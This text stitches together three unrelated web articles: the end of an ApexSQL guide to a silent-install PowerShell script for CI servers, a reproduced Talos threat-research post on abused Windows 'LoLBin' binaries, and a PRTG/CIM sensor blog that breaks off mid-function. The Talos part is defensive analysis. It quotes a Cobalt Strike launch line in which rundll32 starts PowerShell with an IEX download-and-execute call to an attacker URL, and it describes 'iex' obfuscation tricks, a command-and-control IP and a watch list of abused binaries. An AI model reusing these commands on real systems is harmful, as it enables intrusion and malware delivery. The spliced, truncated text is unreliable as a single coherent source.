
    $ProductVersion = (get-childitem $Path).VersionInfo.ProductVersion
    $ProductVersion = $ProductVersion.Trim()

Note: the “Trim” function is used to remove the excessive space character that will be present at the end of the extracted value.

The next step is to check whether the product is already installed. This command produces True or False depending on whether the product name exists in the registry:

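    $installed = $null -ne (Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Where { $_.DisplayName -eq $Product })

Putting $null on the left of -ne keeps the result a plain True/False, even when several registry entries match.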

Based on the logical value, if the application is not installed, this command will start the installation in silent mode immediately (through CLI execution):

    if (!$installed) {Start-Process $path -ArgumentList "/VERYSILENT /SUPPRESSMSGBOXES /NORESTART" -Wait}

In case the application is installed we would need to check the version. We will read all registry parameters for the application, which includes the version also:

    $ProductParams = (Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Where {($_.DisplayName -eq $Product)})

The parameters would look like this:

Finally, the script checks whether the installed version from the registry is lower than the installer's version. If it is, the silent installation starts:

if($ProductParams.DisplayVersion -lt $ProductVersion) {Start-Process $path -ArgumentList "/VERYSILENT /SUPPRESSMSGBOXES /NORESTART" -Wait}

Note that Start-Process is called with the -Wait parameter, so the script waits for the installer to finish; without it, the continuous integration server could end the process as soon as the task finishes.
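Comparing version strings as plain text can give the wrong answer, because text is compared character by character. The Python sketch below (an illustration only; the version numbers are hypothetical) contrasts a text comparison with a numeric, component-by-component one, which is what casting to [version] provides in PowerShell.

```python
def parse_version(text):
    """Split a dotted version such as '2019.4.1234' into a tuple of integers."""
    return tuple(int(part) for part in text.strip().split("."))


def needs_update(installed, available):
    """True when the installed version is older; tuples compare element by element."""
    return parse_version(installed) < parse_version(available)


# Plain text comparison works character by character: '1' < '9', so this is misleading
print("2019.10.100" < "2019.9.100")               # True
print(needs_update("2019.10.100", "2019.9.100"))  # False
```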

The entire script looks like this:

#set the installer path
$path = "c:\InstallRepo\ApexSQLDiff.exe"
#read the product name
$Product = (Get-ChildItem $path).VersionInfo.ProductName
$Product = $Product.Trim()
#read the product version
$ProductVersion = (Get-ChildItem $path).VersionInfo.ProductVersion
$ProductVersion = $ProductVersion.Trim()
#check if installed
$installed = $null -ne (Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Where-Object { $_.DisplayName -eq $Product })
#exit code reported to the CI server (0 = nothing needed to be installed)
$exitCode = 0
#start installation if not installed
if (!$installed) {
    $exitCode = (Start-Process $path -ArgumentList "/VERYSILENT /SUPPRESSMSGBOXES /NORESTART" -Wait -PassThru).ExitCode
}
else {
    #read the installed parameters
    $ProductParams = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Where-Object { $_.DisplayName -eq $Product }
    #check the version and start installation if the installed one is older
    if ([version]$ProductParams.DisplayVersion -lt [version]$ProductVersion) {
        $exitCode = (Start-Process $path -ArgumentList "/VERYSILENT /SUPPRESSMSGBOXES /NORESTART" -Wait -PassThru).ExitCode
    }
}
#Start-Process does not set $LastExitCode, so return the installer's exit code explicitly
exit $exitCode

The script should then be saved as a .ps1 file so it can be executed in the database continuous integration pipeline.

In the following sections, we will consider a basic pipeline that consists of the Build and Package steps. Put simply, this pipeline builds a database from SQL code located in source control and creates a database package with scripted database objects. We won't go into further detail on configuring the database continuous integration pipeline here; that information can be found in the ApexSQL DevOps toolkit knowledgebase.

Jenkins

What sets Jenkins apart from the other continuous integration servers is that it doesn't have native (built-in) PowerShell support. This means it requires a plugin, which can be installed from the Jenkins gallery:

With the plugin present, the PowerShell step can be found in the Jenkins build steps gallery:

When added, the step shows a text box where the PowerShell script can be inserted. This PowerShell plugin does not directly support executing a PowerShell script file, so the entire script should be placed here:

After that, we can just save the database continuous integration pipeline and execute it.

TeamCity

In contrast to the Jenkins CI server, TeamCity has built-in support for PowerShell execution, so it is ready to be used right out-of-the-box.

To use the created PowerShell script in TeamCity, add a build step with the PowerShell runner type to the current build configuration, which holds the database continuous integration pipeline built from ApexSQL DevOps toolkit steps:

When selected, the PowerShell runner shows its configuration layout. Here, the Script option should be set to File, so the created PowerShell script can be imported by filling in its path in the Script file field. Optionally, the Step name field can be populated to give this step a recognizable name:

When step configuration is saved, the database continuous integration pipeline will look like this:

Finally, it is ready for execution to build a database and install the application.

Bamboo

Like TeamCity, the Bamboo CI server has built-in support for PowerShell execution. In the database continuous integration pipeline created with the ApexSQL DevOps toolkit steps, a PowerShell step should be added to perform the additional task.

To execute any PowerShell script, the integrated Bamboo Script task should be chosen. It can be found in the gallery under the Builder category:

This task has interpreters for three types of scripts (Windows PowerShell, Linux shell, and Windows command line), which can be chosen manually, or autodetection can be used. The Shell option autodetects the type of script based on its first line:

Let's pick the Windows PowerShell option directly, then set the Script location select box to File (as opposed to Inline, where the script text is entered directly) and add the path to our created script:

The database continuous integration pipeline with the additional task will look like this and is ready for execution:

Azure DevOps Server/Services

Azure DevOps also has integrated support for PowerShell execution, and configuring it is similar to the previous examples. In the pipeline formed with the tasks from the ApexSQL DevOps toolkit extension, we should add a new task and find the PowerShell task in the task gallery. The gallery can contain lots of different Azure DevOps tasks, so the easiest way to find the PowerShell task is to type a search term:

When added, the task will require setting the source Type as the File Path and the location of the script in the Script Path field:

Just like that, the Azure DevOps pipeline is complete.

Web dashboard

Although it is a specialized database continuous integration solution, the standalone ApexSQL DevOps toolkit – Web dashboard provides additional project flexibility with its support for PowerShell execution.

In the image, we can observe the same example with the Build and the Package steps that form the basic CI pipeline. To this sequence of steps, we can add the Custom step in order to use the created PowerShell script:

The Custom step configuration is as simple as all previously explained examples. The only difference here is that the script will have to be placed in the Web dashboard’s user-defined project folder as the application uses that location for external inputs:

First, the PowerShell script file should be provided for the Script path field. The folder browser button should be used here to open the project folder location and pick the appropriate script:

The Include output in package option is optional. If it is used, the step's output (essentially the PowerShell execution summary) will be stored in a NuGet package, which can be the same package used by the rest of the steps in the pipeline. The Additional parameters field can be used to pass any external parameters the script needs for a successful run:

As a result of the executed example PowerShell script, we can easily observe that the desired application is indeed installed:

Conclusion

This example shows just a small part of what can be done on the fly by combining PowerShell with the database continuous integration pipelines provided by the ApexSQL DevOps toolkit solutions to automate a wide range of use cases.

Original post from Talos Security, by Vanja Svajcer.

Introduction

Attackers’ trends tend to come and go. But one popular technique we’re seeing at this time is the use of living-off-the-land binaries — or “LoLBins”. LoLBins are used by different actors combined with fileless malware and legitimate cloud services to improve chances of staying undetected within an organisation, usually during post-exploitation attack phases.

Living-off-the-land tactics mean that attackers are using pre-installed tools to carry out their work. This makes it more difficult for defenders to detect attacks and researchers to identify the attackers behind the campaign. In the attacks we’re seeing, there are binaries supplied by the victim’s operating system that are normally used for legitimate purposes, but in these cases, are being abused by the attackers.

In this post, we will take a look at the use of LoLBins through the lens of Cisco's product telemetry. We'll also walk through the most frequently abused Windows system binaries and measure their usage by analyzing data from Cisco AMP for Endpoints.

You'll also find an overview of a few recent campaigns we've seen using LoLBins, along with recommendations for detecting malicious LoLBin activity.

What are LoLBins

A LoLBin is any binary supplied by the operating system that is normally used for legitimate purposes but can also be abused by malicious actors. Several default system binaries have unexpected side effects, which may allow attackers to hide their activities post-exploitation.

The concept of LoLBins is not new and isn’t specific to Windows. Almost all conventional operating systems, starting from the early DOS versions and Unix systems, contained executables that attackers could exploit.

Here is an example from the mid-80s in which binary code to reboot the computer was supplied as text to the default debug.com DOS debugger, designed to avoid detection by anti-malware scanners and run malicious code as intended.

N SET.COM
A 100
MOV AX,0040
MOV DS,AX
MOV AX,1234
MOV [0072],AX
JMP F000:FFF0

RCX
10
W
Q
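To see why RCX is set to 10 before the W (write) command, the Python sketch below lists the 8086 machine code the five assembly lines should produce. The encodings are hand-assembled standard 8086 forms, not bytes captured from DEBUG. The program stores 1234h at 0040:0072 (the BIOS warm-boot flag) and jumps to the reset entry point F000:FFF0; DEBUG takes the length of the file to write from CX (in hexadecimal), so 16 bytes means RCX 10.

```python
# Hand-assembled 8086 encodings for the DEBUG script above (assumed, not captured from DEBUG)
SET_COM = bytes.fromhex(
    "B84000"      # MOV AX,0040
    "8ED8"        # MOV DS,AX
    "B83412"      # MOV AX,1234
    "A37200"      # MOV [0072],AX  -> 0040:0072 = 1234h (warm-boot flag)
    "EAF0FF00F0"  # JMP F000:FFF0  -> BIOS reset entry point
)

# RCX 10 tells DEBUG to write 0x10 bytes with the W command
print(len(SET_COM), hex(len(SET_COM)))  # 16 0x10
```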

In their presentation at DerbyCon 3, Matthew Graeber and Christopher Campbell set the baseline for Windows by discussing the advantages of using default Windows binaries to conduct red team activities and evade defensive mechanisms.

In this post we also focus on Windows LoLBins and their usage today.

Overall, attackers can use LoLBins to:

Download and install malicious code

Execute malicious code

Bypass UAC

Bypass application control such as Windows Defender Application Control (WDAC)

Attackers may be able to target other utilities that are often pre-installed by system manufacturers and may be discovered during reconnaissance. These executables can be signed utilities such as updaters, configuration programs and various third party drivers.

The usage of LoLBins has frequently been combined with legitimate cloud services such as GitHub, Pastebin, Amazon S3 storage and cloud drives such as Dropbox, Box and Google Drive. When legitimate cloud services are used for storing malicious code, hosting command and control (C2) infrastructure and exfiltrating data, attackers' activities are more likely to remain undetected, as the generated traffic does not differ from the traffic generated by systems that are not compromised.

Talos is mainly interested in finding executables that can be used to download or execute malicious code. In our research, we monitor daily execution patterns of the following executables to detect their abuse:

powershell.exe

bitsadmin.exe

certutil.exe

psexec.exe

wmic.exe

mshta.exe

mofcomp.exe

cmstp.exe

windbg.exe

cdb.exe

msbuild.exe

csc.exe

regsvr32.exe

Abusing PowerShell

In recent times, PowerShell has been a primary suspect for malicious code download and in-memory execution. Threat actors commonly use this command shell, which is built on the Windows management and .NET frameworks. This powerful administration environment has an execution policy that can prevent the execution of untrusted code. Unfortunately, this policy can be easily circumvented with a single command-line option.

One could argue that executing PowerShell with the option to bypass the execution policy should be blocked outright. However, a number of legitimate tools, such as the Chocolatey package manager and some system management tools, use exactly that command line.

PowerShell's code is not case-sensitive, and it will accept shortened versions of command-line options, as long as the option isn't ambiguous. For example, the -EncodedCommand option, which accepts a Base64-encoded string as a parameter, can also be invoked as -EncodedC or even -enc, the form commonly used by malicious actors.
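A minimal Python sketch of how a hunting script might catch these abbreviated forms: treat any token that is a case-insensitive prefix of -EncodedCommand as that option, then decode the following token. PowerShell expects the Base64 string to encode UTF-16LE text. The four-character minimum (-enc) is our own assumption to limit false matches, not a PowerShell rule, and the function name is hypothetical.

```python
import base64

FULL_OPTION = "-encodedcommand"
MIN_PREFIX = 4  # assumption: accept "-enc" and longer; shorter forms are not matched here


def decode_encoded_command(command_line):
    """Return the decoded script if the command line uses any abbreviation of
    -EncodedCommand (case-insensitive), otherwise None."""
    tokens = command_line.split()
    for option, argument in zip(tokens, tokens[1:]):
        opt = option.lower()
        if len(opt) >= MIN_PREFIX and FULL_OPTION.startswith(opt):
            # -EncodedCommand takes Base64 of a UTF-16LE string
            return base64.b64decode(argument).decode("utf-16-le")
    return None


script = "Write-Output 'hello'"
payload = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
print(decode_encoded_command(f"powershell.exe -NoP -EnC {payload}"))  # Write-Output 'hello'
```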

Popular malware such as Sodinokibi and Gandcrab has used reflective DLL loaders in the past, which allow attackers to load a dynamic library into process memory without going through the standard Windows loader (LoadLibrary).

The Invoke-Obfuscation module is often used to create polymorphic obfuscated variants designed to evade antivirus programs and other defensive mechanisms.

Over time, attackers have also realized the malicious potential of PowerShell, widening the number of executables used as LoLBins. Msbuild.exe and C# compiler csc.exe are some of the most frequently used by red teams. Both are frequently used to download, build and load malicious code that is built for that particular system and does not appear on any executable block list.

Measuring LoLBins usage

We analyzed telemetry provided by Cisco AMP for Endpoints to measure how often LoLBins are abused. The telemetry, sent over a secure channel, contains the names of invoked processes and cryptographic checksums of their file images, which helps us track file trajectories and build parent-child process relationships that can be used for hunting.

An example of a process retrospection graph in AMP telemetry.

The telemetry data is focused on detecting new attacks as they happen but it should also allow us to measure how many potential LoLBin invocations are suspicious.

We looked at different LoLBins where the decision could be made quickly. In all cases, we assumed the worst-case scenario and designated any invocation of the following processes with a URL as a parameter as suspicious:

mshta.exe

certutil.exe

bitsadmin.exe

regsvr32.exe

powershell.exe
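The worst-case rule above (one of these five processes plus a URL anywhere in its command line) is simple enough to sketch in a few lines of Python. The regular expression and function name are our own illustration, not the AMP implementation.

```python
import ntpath
import re

# The five binaries treated as suspicious when a URL is passed to them
WATCHED = {"mshta.exe", "certutil.exe", "bitsadmin.exe", "regsvr32.exe", "powershell.exe"}
URL_PATTERN = re.compile(r"(?:https?|ftp)://\S+", re.IGNORECASE)


def is_suspicious(image_path, command_line):
    """Worst-case rule: a watched LoLBin invoked with a URL anywhere in its command line."""
    name = ntpath.basename(image_path).lower()  # ntpath splits Windows paths on any OS
    return name in WATCHED and URL_PATTERN.search(command_line) is not None


print(is_suspicious(r"C:\Windows\System32\certutil.exe",
                    "certutil -urlcache -split -f http://example.com/a.txt a.txt"))  # True
```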

Our relaxed definition of a suspicious process invocation means that it also has a significant false-positive rate. For example, for PowerShell invocations with a URL in the command line, we estimate that only 7 percent of the initially chosen calls should be checked in depth and are likely to be malicious.

We obtain the percentage of suspicious calls by mining billions of daily data points and dividing the number of detected suspicious calls by the overall number of calls. Overall, our worst-case scenario shows that at least 99.8 percent of all LoLBin invocations are not worth further investigation.

LoLBins and percentages of suspect invocations.

We then distilled down these potentially suspicious calls to find the ones that are likely to be malicious.

Take PowerShell as an example once again. The worst figure for potentially suspicious PowerShell process executions was 0.2 percent. However, as mentioned before, only 7 percent of those actually require in-depth investigation, which brings the percentage down to 0.014 percent. Therefore, at least 99.986 percent of PowerShell invocations are legitimate.
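The step from 0.2 percent to 0.014 percent is the product of the two proportions, as this short Python check shows:

```python
suspicious_share = 0.2 / 100  # worst-case share of PowerShell calls flagged as suspicious
needs_review = 7 / 100        # share of flagged calls that warrant in-depth investigation

likely_malicious = suspicious_share * needs_review
print(f"{likely_malicious:.3%}")       # 0.014%
print(f"{1 - likely_malicious:.3%}")   # 99.986%
```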

A simple rule of thumb for URLs that can be used to pinpoint calls that are more likely to be malicious is to look for LoLBins invocation combined with:

External numeric IP address

Any .net TLD

Any .eu TLD

Any .ru TLD

Any URL ending with an executable or image extension (e.g. .EXE, .LNK, .DLL, .JPG, .PNG etc.)

Any reference to Pastebin.com and its clones

Any reference to Github or any other source code repository sites
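These rules of thumb translate directly into a URL check. The Python sketch below is a hedged illustration: the paste and code-hosting host list is hypothetical (the post names only Pastebin, GitHub and their clones), the extension list covers only the examples named above, and "external" is interpreted as Python's ipaddress is_global.

```python
import ipaddress
from urllib.parse import urlparse

SUSPICIOUS_TLDS = (".net", ".eu", ".ru")
# The post says "etc."; these are only the extensions it names
SUSPICIOUS_EXTENSIONS = (".exe", ".lnk", ".dll", ".jpg", ".png")
# Hypothetical examples of paste and code-hosting sites
PASTE_AND_REPO_HOSTS = ("pastebin.com", "github.com", "githubusercontent.com")


def url_red_flags(url):
    """Return the rule-of-thumb red flags that a URL passed to a LoLBin triggers."""
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    path = parsed.path.lower()
    flags = []
    try:
        if ipaddress.ip_address(host).is_global:  # "external" read as globally routable
            flags.append("external numeric IP")
    except ValueError:
        pass  # the host is a name, not an IP literal
    if host.endswith(SUSPICIOUS_TLDS):
        flags.append("suspicious TLD")
    if path.endswith(SUSPICIOUS_EXTENSIONS):
        flags.append("executable or image extension")
    if any(host == h or host.endswith("." + h) for h in PASTE_AND_REPO_HOSTS):
        flags.append("paste or code-hosting site")
    return flags


print(url_red_flags("http://134.209.176.24/payload.png"))
```

An empty list means none of the rules matched, which, as the percentages above show, is the normal case.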

Red teams’ activities

Although the majority of recorded suspicious calls belong to malicious actors, it is worth noting that red team activities are also visible. Here, security teams and penetration testers often use adversarial simulation frameworks such as Red Canary's Atomic Red Team tests to test organizational defences against the tools, techniques and processes classified in the ATT&CK knowledge base.

Some red team tools are tailored to mimic the activity of popular tools such as Mimikatz. Here is an example of a tailor-made script hosted on GitHub that emulates the adversarial technique of using a reputable domain to store malicious code.

Red team members using fake Mimikatz module to test defenses.

LoLBins actors’ skill levels

In this section, we’ll describe three individual campaigns, showing usage of PowerShell combined with memory-only code from three different actors with different skill sets. These campaigns can be relatively easily detected by internal hunting teams by analyzing command lines and their options.

Case 1: Common ransomware

The first case involves the Sodinokibi ransomware. Sodinokibi is a rather common ransomware that spreads by using standard methods like phishing and exploit kits, as well as exploiting vulnerabilities in web frameworks such as WebLogic.

We see from telemetry that PowerShell is launched with Invoke-Expression cmdlet evaluating code downloaded from a Pastebin web page using the Net.WebClient.DownloadString function, which downloads a web page as a string and stores it in memory.

Initial Sodinokibi PowerShell invocation.

The downloaded code is a reflective DLL loader with randomized function names to avoid simple pattern-based detection engines. The ransomware payload is Base64-encoded and stored in the variable $PEBytes32. It is worth noting that Base64-encoded executable payloads can be recognized instantly by their first two characters, "TV", because the "MZ" signature at the start of the DOS stub of a PE executable always encodes to a string beginning with "TV".

Reflective DLL loader loads Sodinokibi payload
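A minimal Python sketch of the "TV" heuristic: check the prefix, then decode a short, correctly padded slice to confirm the "MZ" signature. The function name is our own; the sample header bytes are typical of a DOS stub but are used here only for illustration.

```python
import base64


def looks_like_base64_pe(text):
    """Heuristic: Base64 of data starting with 'MZ' begins with 'TV'."""
    s = text.strip()
    if not s.startswith("TV"):
        return False
    try:
        # Decode a short prefix (a multiple of 4 characters) and confirm the MZ signature
        return base64.b64decode(s[:8], validate=True)[:2] == b"MZ"
    except ValueError:  # binascii.Error is a subclass of ValueError
        return False


header = b"MZ\x90\x00\x03\x00\x00\x00"  # first bytes of a typical DOS stub
encoded = base64.b64encode(header).decode()
print(encoded[:4], looks_like_base64_pe(encoded))  # TVqQ True
```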

Sodinokibi and Gandcrab are very common, but that does not mean that actors behind them are not technically proficient. Although they use off-the-shelf techniques to spread and execute payloads, we can still estimate that they have an intermediate skill level.

Case 2: Intermediate miner

Our second actor used PowerShell's ability to obfuscate code, deobfuscating several layers in memory before reaching the actual PowerShell script that installs and launches a cryptocurrency-mining payload.

First Invoke-Obfuscation layer decoded

The Invoke-Obfuscation module is often used for PowerShell obfuscation. Apart from obfuscating the whole next-layer script code, it also hides the invocation of the Invoke-Expression (IEX) cmdlet. In this example, the $Env:COMSpec variable contains the string "C:\Windows\System32\cmd.exe", so joining the characters at zero-based positions 4, 15 and 25 forms the string "iex".

This cryptocurrency miner had five deobfuscation stages, and in the final one, the invocation of IEX was hidden by getting the name of the variable MaximumDriveCount using "gv" (the Get-Variable alias) with the parameter "*mdr*" and picking the characters at zero-based positions 3, 11 and 2 to form "iex".

Extracting ‘iex’ from MaximumDriveCount
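Both tricks rely on zero-based character indexing. The Python sketch below mirrors PowerShell's $string[i,j,k] -join '' with a hypothetical helper; the ComSpec value is assumed to be the common default. Because PowerShell is case-insensitive, an upper-case variant such as C:\WINDOWS\system32\cmd.exe still yields a usable "Iex".

```python
def pick(text, indices):
    """Join characters at zero-based indices, like PowerShell's $s[4,15,25] -join ''."""
    return "".join(text[i] for i in indices)


comspec = r"C:\Windows\System32\cmd.exe"  # a typical $env:ComSpec value (assumed)
print(pick(comspec, [4, 15, 25]))             # iex
print(pick("MaximumDriveCount", [3, 11, 2]))  # iex
```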

The downloaded PowerShell script contains functionality to disable Windows Defender, Malwarebytes and Sophos anti-malware software, to install a modified XMRig cryptocurrency-mining payload, and to download modules intended to steal user credentials from memory and use them to attempt to spread laterally by passing the hash (Invoke-TheHash) through SMB or WMI.

Deobfuscated crypto-miner loader

Case 3: Hiding Cobalt Strike in network traffic

Our final case study shows the activities of a more advanced actor. The actor uses a Cobalt Strike beacon for their post-exploitation activities, with a PowerShell stager taken from the Cobalt Strike framework.

The telemetry shows this attack launched by abusing rundll32.exe and the command line invoking JScript code to download a web page and launch the initial PowerShell stager.

rundll32.exe javascript:\..\mshtml,RunHTMLApplication ;document.write();new%20ActiveXObject(WScript.Shell).Run(powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('hxxps://stjohnplece.co/lll/webax.js');

The first PowerShell stage, webax.js, despite its misleading filename extension, decompresses the second-stage PowerShell code, which loads the first shellcode stage into memory and creates a specific request to download what appears to be a standard jQuery JavaScript library.

Cobalt Strike PowerShell stager

The shellcode creates an HTTP GET request to the IP address 134.209.176.24, but with a Host header field indicating that the requested host is code.jquery.com, the legitimate host serving jQuery. This technique seems to successfully bypass some automated execution environments, whose analysis results show that the request went to the legitimate host and not to the malicious IP address.

HTTP header with the spoofed host field

The downloaded malicious jQuery starts with the actual jQuery code in the first 4,015 bytes, followed by the obfuscated Cobalt Strike beacon, which gets deobfuscated with a static XOR key and loaded into memory using reflective loading techniques.

The beginning and the end of malicious jQuery and Cobalt Strike payload

The malicious jQuery ends with 1,520 bytes of the actual jQuery code, presumably to avoid anti-malware scanners scanning the request top and tail.
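For analysts, the layout described above suggests a simple carving step: drop the genuine jQuery head and tail, then undo the XOR. The Python sketch below assumes a repeating static key; the post does not give the key or its length, so the key and the sample data are made up.

```python
from itertools import cycle

HEAD_LEN = 4015  # genuine jQuery bytes before the payload (figure from the post)
TAIL_LEN = 1520  # genuine jQuery bytes after the payload (figure from the post)


def carve_payload(data, head=HEAD_LEN, tail=TAIL_LEN):
    """Strip the legitimate jQuery wrapper and return the embedded blob."""
    if len(data) <= head + tail:
        raise ValueError("file too short to contain an embedded payload")
    return data[head:len(data) - tail]


def xor_bytes(blob, key):
    """XOR with a repeating static key; applying it twice restores the input."""
    return bytes(b ^ k for b, k in zip(blob, cycle(key)))


# Synthetic sample: fake jQuery padding around an XOR-obfuscated blob (key is made up)
key = b"\x2a"
sample = b"A" * HEAD_LEN + xor_bytes(b"MZ fake beacon", key) + b"B" * TAIL_LEN
print(xor_bytes(carve_payload(sample), key))  # b'MZ fake beacon'
```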

This technique of hiding a binary payload within the jQuery library and evading malicious IP address detection shows that we are dealing with a more advanced actor, one that takes its operational security seriously.

Overall, we cannot pinpoint a single type of actor that focuses on using LoLBins. Although LoLBins may once have been used only by more advanced actors, today they are also used by actors employing common malicious code such as ransomware or cryptominers.

Detecting and preventing LoLBins abuse

The protection against abuse of LoLBins combined with fileless code is difficult for security controls that do not monitor process behavior. The abuse can be detected based on the parent-child relationship of the launched processes as well as anomalies in network activity of processes that are not usually associated with network communication.

Organisations are advised to configure their systems for centralized logging, where further analytics can be performed by hunting teams. Since version 5, PowerShell can also be configured to log all executed script blocks to the Windows event log. This helps security teams understand obfuscated code: because the code must be deobfuscated before it runs, the deobfuscated version is what appears in the Windows event logs.

However, the best possible protection is to deny execution of LoLBins using mechanisms such as Windows Defender Application Control. Microsoft created a policy block file, which will block execution of LoLBins not required on protected systems.

Unfortunately, blocking all LoLBins is not possible in most environments since they are also required by legitimate processes.

Conclusion

Our research shows that many types of actors, from commodity malware operators to more targeted attackers, employ various techniques to use LoLBins in their activities. However, the overall proportion of malicious usage is very low (below 0.2 percent), which does not justify blocking all invocations of LoLBins.

Nevertheless, blue team members must keep LoLBins in mind while conducting regular hunting activities. If used successfully, LoLBins can make an attacker's activities more difficult to trace or let their malware linger longer on the victim machine.

Coverage

It is advisable to employ endpoint detection and response (EDR) tools such as Cisco AMP for Endpoints, which give users the ability to track process invocations and inspect processes.

Additional ways our customers can detect and block these threats are listed below.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

IoCs

Sodinokibi

dc3de6cff67f4bcb360d9fdd0fd5bd0d6afca0e1518171b8e364bb64c5446bb1 dc788044ba918463ddea34c1128c9f4da56e0778e582ae9abdeb15fdbcc57e80

Xmrig related

4528341b513fb216e06899a24d3560b89636158432ba7a0a118caa992739690e c4ef0e90f81bac29899070d872e9ddea4531dbb5a18cdae090c19260cb0d4d83 e0ffda3353a17f5c9b7ef1d9c51f7dc1dcece1dfa2bcc8e1c93c27e5dde3b468 3f8d2e37a2bd83073e61ad4fc55536007076ae59a774b5d0c194a2bfab176172 92f0a4e2b7f4fe9d4ea373e63d9b08f4c2f21b2fd6532226c3fd576647efd64a ebb7d224017d72d9f7462db541ac3dde38d2e7ecebfc9dca52b929373793590

Cobalt strike stager

522b99b5314531af6658e01ab471e1a7e0a5aa3a6ec100671dcfa0a6b0a1f52d 4c1a9ba633f739434cc81f23de9c6c1c12cdeacd985b96404a4c2bae2e54b0f5 f09d5ca3dfc53c1a6b61227646241847c5621b55f72ca9284f85abf5d0f06d35

Go to source: Hunting For LoLBins (original post from Talos Security, by Vanja Svajcer).

PRTG Sensor Condensing With PowerShell

If you are an administrator in an enterprise environment, there is a good chance you know about PRTG Network Monitor. It is a great application for monitoring all kinds of data from the devices in a network: application data, resource usage, whatever your heart desires. It has an auto-discovery feature that discovers new devices and recommends sensors. The sensors PRTG recommends typically monitor one thing each, and the licensing is mostly based on how many sensors you have paid for. When you start reaching your limit and the budget is tight because the IT department is short on funds, this may be a solution for you. The sensor I made for this purpose can be found on my GitHub page.

The PRTG sensors that monitor CPU, memory, and disk space use Windows Management Instrumentation (WMI). WMI is being replaced with the Common Information Model (CIM) on Windows devices. WMI was Microsoft's original implementation of CIMv2. CIM is a vendor-independent standard for describing the hardware and OS components of computer systems and providing tools that a program can use to both read and modify components. Remote management using WMI is considered a security risk and should be avoided when possible; info on that will be for another blog. These are some of the many reasons I use CIM whenever possible. Why would Microsoft change the way objects are identified inside its object-based operating system, you ask? Great question.

The only real thing the CIM cmdlets can't do that the WMI cmdlets can is access amended qualifiers such as the class description. Many classes do not set this attribute, so this has not been a hardship for me at least. The way WMI is set up, combined with how long it has been around, has caused object names to be duplicated: different namespaces contain classes and instances with the same name, which can be confusing and cause scripts to behave in unintended ways. CIM eliminates this issue, along with the other points listed below.

Use of WSMAN for remote access (this means no more DCOM errors; you can fall back to DCOM for accessing systems that only have WSMAN 2 installed)

Use of CIM sessions allows for accessing multiple machines

Get-CIMClass can be utilized for investigating WMI classes

Improves dealing with WMI associations

PRTG's documentation for creating custom sensors is phenomenally detailed. These sensors work by having PRTG run a .bat or .ps1 script. The results are then placed into an XML format that the PRTG server interprets and displays for the admin monitoring the network devices. The sensor on my GitHub page is considered an EXE/Advanced custom sensor because it returns XML output, whereas a standard EXE sensor only returns a single result. PRTG sensors usually monitor only one thing because we do not want to overload a sensor with information. The maximum number of result fields allowed per sensor is somewhere between 50 and 60. That is an easy number to stay under; however, if CPU usage gets too high, inaccurate results may be produced.
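To show the general shape of that XML, here is a minimal Python sketch that builds EXE/Advanced output with the standard library. It is not the author's PowerShell sensor: the tag names (prtg, result, channel, value, float, unit, LimitMode, LimitMaxWarning, LimitMaxError, text) follow PRTG's custom sensor format as we understand it, and the channel names and limits are made up. ET.indent requires Python 3.9 or later.

```python
import xml.etree.ElementTree as ET


def prtg_xml(channels, text="OK"):
    """Build EXE/Advanced sensor output.

    channels: list of dicts with 'name' and 'value', plus optional
    'unit', 'warn' and 'error' (upper warning/error limits).
    """
    root = ET.Element("prtg")
    for ch in channels:
        result = ET.SubElement(root, "result")
        ET.SubElement(result, "channel").text = ch["name"]
        ET.SubElement(result, "value").text = str(ch["value"])
        if isinstance(ch["value"], float):
            ET.SubElement(result, "float").text = "1"  # values are integers unless flagged
        if "unit" in ch:
            ET.SubElement(result, "unit").text = ch["unit"]
        if "warn" in ch or "error" in ch:
            ET.SubElement(result, "LimitMode").text = "1"  # turn the limits on
            if "warn" in ch:
                ET.SubElement(result, "LimitMaxWarning").text = str(ch["warn"])
            if "error" in ch:
                ET.SubElement(result, "LimitMaxError").text = str(ch["error"])
    ET.SubElement(root, "text").text = text
    ET.indent(root)  # pretty-print with two-space indentation (Python 3.9+)
    return ET.tostring(root, encoding="unicode")


print(prtg_xml([
    {"name": "CPU Load", "value": 12, "unit": "Percent", "warn": 80, "error": 90},
    {"name": "Free Disk C:", "value": 37.5, "unit": "Percent"},
]))
```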

In the code below, we create a CIM session to a remote device and run three commands inside it, instead of opening a session, issuing a command and closing the session three separate times. This saves time and resources. We use a CIM session rather than a PSSession because CIM sessions add the security of not allowing the execution of arbitrary commands or the return of arbitrary objects. They also take up fewer system resources: a CIM session stays dormant in the background of a Windows PowerShell session until an instruction is received.

$CimSessionOptions = New-CimSessionOption -UseSsl

$CIMSession = New-CimSession -ComputerName $Device -SessionOption $CimSessionOptions

$OS = Get-CimInstance -CimSession $CIMSession -ClassName "Win32_OperatingSystem"

$CPUs = Get-CimInstance -CimSession $CIMSession -ClassName "Win32_Processor"

$Disks = Get-CimInstance -CimSession $CIMSession -ClassName "Win32_LogicalDisk" | Where-Object -Property 'DriveType' -eq 3
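The post does not show which properties of these three classes the sensor reads. As a hedged illustration, the Python sketch below turns standard properties of those classes (Win32_OperatingSystem.TotalVisibleMemorySize and FreePhysicalMemory in kilobytes, Win32_LogicalDisk.Size and FreeSpace in bytes, Win32_Processor.LoadPercentage) into percentage channels; the choice of properties, the helper names and the sample numbers are our assumptions.

```python
def memory_used_percent(total_visible_kb, free_physical_kb):
    """Win32_OperatingSystem reports TotalVisibleMemorySize and FreePhysicalMemory in KB."""
    return round(100 * (total_visible_kb - free_physical_kb) / total_visible_kb, 1)


def disk_free_percent(size_bytes, free_bytes):
    """Win32_LogicalDisk reports Size and FreeSpace in bytes."""
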